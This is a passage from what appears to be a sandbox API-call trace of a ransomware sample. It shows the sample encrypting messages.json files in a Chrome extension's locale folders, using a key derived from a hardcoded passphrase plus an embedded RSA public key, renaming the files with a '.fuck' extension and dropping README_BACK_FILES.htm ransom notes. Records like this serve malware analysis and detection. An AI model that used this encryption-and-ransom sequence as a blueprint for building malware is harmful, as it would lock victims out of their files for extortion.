lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0248.077] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.077] CryptDestroyKey (hKey=0x29389f8) returned 1 [0248.077] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.077] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.077] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.080] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0248.080] AreFileApisANSI () returned 1 [0248.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.080] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.081] GetFileType (hFile=0x5d50) returned 0x1 [0248.081] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.082] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.082] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.082] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.083] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.083] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.083] GetLastError () returned 0x0 [0248.083] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json")) returned 0x20 [0248.083] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json", dwFileAttributes=0x80) returned 1 [0248.084] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.084] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.086] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.086] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.089] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.089] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.089] CryptHashData (hHash=0x2938978, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.089] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.089] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.089] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.089] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b610) returned 1 [0248.090] CryptImportPublicKeyInfo (in: hCryptProv=0x293b610, dwCertEncodingType=0x1, pInfo=0x292f050*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f080*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f088*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936e78) returned 1 [0248.090] CryptEncrypt (in: hKey=0x2936e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.090] CryptEncrypt (in: hKey=0x2936e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293be08*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293be08*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.090] WriteFile (in: hFile=0x5d58, lpBuffer=0x293be08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293be08*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.091] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe1, lpOverlapped=0x0) returned 1 [0248.092] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.092] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.092] CloseHandle (hObject=0x5d5c) returned 1 [0248.092] CloseHandle (hObject=0x5d58) returned 1 [0248.095] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), bFailIfExists=0) returned 1 [0248.100] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json", dwFileAttributes=0x0) returned 1 [0248.101] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.gsg")) returned 1 [0248.102] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.fuck")) returned 1 [0248.103] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.103] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.103] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.103] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.103] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.103] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\readme_back_files.htm")) returned 0xffffffff [0248.104] AreFileApisANSI () returned 1 [0248.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.104] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.104] GetFileType (hFile=0x5d50) returned 0x1 [0248.104] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.106] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.106] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.107] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.107] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.107] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.107] GetLastError () returned 0x0 [0248.107] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json")) returned 0x20 [0248.107] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0248.108] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.108] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.109] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.109] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.112] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.112] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.112] CryptHashData (hHash=0x29389f8, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.112] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29389f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.112] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.112] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.112] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b8b8) returned 1 [0248.113] CryptImportPublicKeyInfo (in: hCryptProv=0x293b8b8, dwCertEncodingType=0x1, pInfo=0x292f460*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f490*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f498*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936d38) returned 1 [0248.113] CryptEncrypt (in: hKey=0x2936d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.113] CryptEncrypt (in: hKey=0x2936d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293ad90*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293ad90*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.113] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293ad90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293ad90*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.115] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x123, lpOverlapped=0x0) returned 1 [0248.116] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x123, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0248.116] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0248.116] CloseHandle (hObject=0x5d58) returned 1 [0248.116] CloseHandle (hObject=0x5d5c) returned 1 [0248.119] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0248.124] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0248.128] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0248.129] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0248.132] CryptDestroyHash (hHash=0x29389f8) returned 1 [0248.132] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.132] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.132] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.132] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.132] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0248.132] AreFileApisANSI () returned 1 [0248.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.132] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.133] GetFileType (hFile=0x5d50) returned 0x1 [0248.133] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.134] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.134] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.135] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.135] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.135] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.135] GetLastError () returned 0x0 [0248.135] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json")) returned 0x20 [0248.135] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0248.136] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" 